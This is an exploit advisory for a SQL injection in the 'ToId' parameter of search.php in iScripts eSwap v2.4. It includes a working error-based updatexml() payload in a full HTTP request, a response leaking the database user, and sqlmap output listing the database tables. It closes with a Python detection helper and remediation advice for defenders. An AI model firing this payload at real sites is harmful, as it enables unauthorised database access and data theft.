Exploit title: iScripts eSwap v2.4 - SQL injection via the search.php User Panel
Date: 23/05/2018
Exploit Author: Keyone
Vendor Homepage: https://www.iscripts.com
Software Link: https://www.iscripts.com/eswap
Demo Link: https://www.demo.iscripts.com/eswap/demo//index.php
Version: 2.4
Tested on: Windows 7
Category: Webapps
CVE:
Description
iScripts eSwap v2.4 has SQL injection via the 'ToId' POST parameter of search.php in the User Panel. The parameter is placed into a MySQL query without sanitisation, and the application echoes the database error text in the response, which allows error-based extraction (here via updatexml()).
PoC: 'ToId' parameter
Request:
POST /eswap/demo/search.php HTTP/1.1
Host: www.demo.iscripts.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
DNT: 1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=csv8f9jgmjl6sh1spblmikbra0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 167
btnGo=Send Message&btnSubAdd=1&qyery=txtHomeSearch=1&ToId=1' and (select updatexml(1,concat(0x2b,user()),1)) and '1'='1&txtMsg=1&txtMsg11=1&txtTitle=1&txtTitle11=Mr.
Response:
HTTP/1.1 200 OK
Date: Wed, 23 May 2018 01:56:08 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23892
...
</td>
</tr>
</table>XPATH syntax error: '+productd_dmouser@localhost'
sqlmap:
[10:04:27] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0
[10:04:27] [INFO] fetching database names
[10:04:30] [INFO] used SQL query returns 2 entries
[10:04:31] [INFO] retrieved: information_schema
[10:04:31] [INFO] retrieved: productd_eswapdemo
available databases [2]:
[*] information_schema
[*] productd_eswapdemo
Database: productd_eswapdemo
[62 tables]
+---------------------------------+
| eswap_sliders |
| eswapaffiliate |
| eswapbanners |
| eswapbanners_lang |
| eswapbatches |
| eswapcashtxn |
| eswapcategory |
| eswapcategory_lang |
| eswapchat |
| eswapclient_module_category |
| eswapcontent |
| eswapcontent_lang |
| eswapcounteroffer |
| eswapcreditpayments |
| eswapescrowrangefee |
| eswapfaq |
| eswapfaq_lang |
| eswapgallery |
| eswaphelp |
| eswaphelp_lang |
| eswaphelpcategory |
| eswaphelpcategory_lang |
| eswaplang |
| eswaplistingfee |
| eswaplookup |
| eswapmandatory |
| eswapmessages |
| eswapmetatags |
| eswapmetatags_lang |
| eswaponline |
| eswappayment |
| eswappaymentdetails |
| eswappins |
| eswapplan |
| eswapplan_lang |
| eswappointhistory |
| eswapreferrals |
| eswapsale |
| eswapsaledetails |
| eswapsaleextra |
| eswapsaleinter |
| eswapsaletemp |
| eswapsliders |
| eswapsmilies |
| eswapsuccessfee |
| eswapsuccesstransactionpayments |
| eswapsurveyquestions |
| eswapswap |
| eswapswapinter |
| eswapswapreturn |
| eswapswaptemp |
| eswapswaptxn |
| eswapswaptxn_old |
| eswaptempdata |
| eswapuser_devices |
| eswapuser_referral |
| eswapuser_sliders |
| eswapusercredits |
| eswapuserfeedback |
| eswapusers |
| eswapusersinter |
| eswapuserstemp |
+---------------------------------+
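The request and response above show the two signals a defender can key on for this class of bug: a form parameter carrying a MySQL error-based function call (updatexml()/extractvalue()), and a response that echoes MySQL's "XPATH syntax error" text, which is what turns the query error into a data leak. The following Python is an added example written for this advisory, not code from the original post or from iScripts; the request/response records it scans are constructed to mirror the traffic above (the leaked user name is a placeholder), and the function and parameter names are assumptions.

```python
"""Triage helper for error-based SQL injection of the kind shown in this
advisory: flags requests whose parameters carry updatexml()/extractvalue()
and responses that echo MySQL's XPath error text.
Added example, not part of the original advisory or of iScripts eSwap."""
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs

# MySQL reports the XPath argument of these functions verbatim in the
# error message, which is why they appear in error-based injection payloads.
ERROR_BASED_FUNCS = re.compile(r"\b(updatexml|extractvalue)\s*\(", re.IGNORECASE)

# Response-side signature: MySQL error 1105 text reaching the client.
XPATH_LEAK = re.compile(r"XPATH syntax error:\s*'([^']*)'")


def suspicious_params(body: str) -> List[str]:
    """Return the names of form parameters whose decoded value contains an
    error-based injection function call. Decoding is done once, the same way
    the application would decode the form."""
    fields = parse_qs(body, keep_blank_values=True)
    return sorted(
        name for name, values in fields.items()
        if any(ERROR_BASED_FUNCS.search(v) for v in values)
    )


def leaked_xpath_value(html: str) -> Optional[str]:
    """If the response echoes MySQL's XPath error, return the leaked string
    (the attacker-chosen marker plus whatever the subquery evaluated to)."""
    m = XPATH_LEAK.search(html)
    return m.group(1) if m else None


def triage(records: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run both checks over captured request/response pairs. A leak without a
    flagged parameter is still reported: that is the case where the request
    filter missed the payload but the application still echoed the error."""
    findings = []
    for r in records:
        params = suspicious_params(r["body"])
        leak = leaked_xpath_value(r["response"])
        if params or leak:
            findings.append({"path": r["path"], "params": params, "leak": leak})
    return findings


# Constructed sample records, modelled on the advisory's traffic. The first
# body is the advisory's payload URL-encoded; the leaked account name is a
# placeholder, not a value from the page.
SAMPLE_RECORDS = [
    {
        "path": "/eswap/demo/search.php",
        "body": ("btnGo=Send+Message&btnSubAdd=1&ToId=1%27+and+%28select+updatexml"
                 "%281%2Cconcat%280x2b%2Cuser%28%29%29%2C1%29%29+and+%271%27%3D%271"
                 "&txtMsg=1&txtTitle=1"),
        "response": "</td></tr></table>XPATH syntax error: '+dbuser@localhost'",
    },
    {
        "path": "/eswap/demo/search.php",
        "body": "btnGo=Send+Message&btnSubAdd=1&ToId=42&txtMsg=hello&txtTitle=hi",
        "response": "<html><body>Message sent</body></html>",
    },
]

if __name__ == "__main__":
    for f in triage(SAMPLE_RECORDS):
        print(f)
```

On the application side the durable fix is the usual pair: bind ToId as a parameter of a prepared statement instead of concatenating it into the query string, and return a generic error page so that MySQL's error text never reaches the client. The response check above is useful precisely because it catches the second problem even on instances where the first has not yet been fixed.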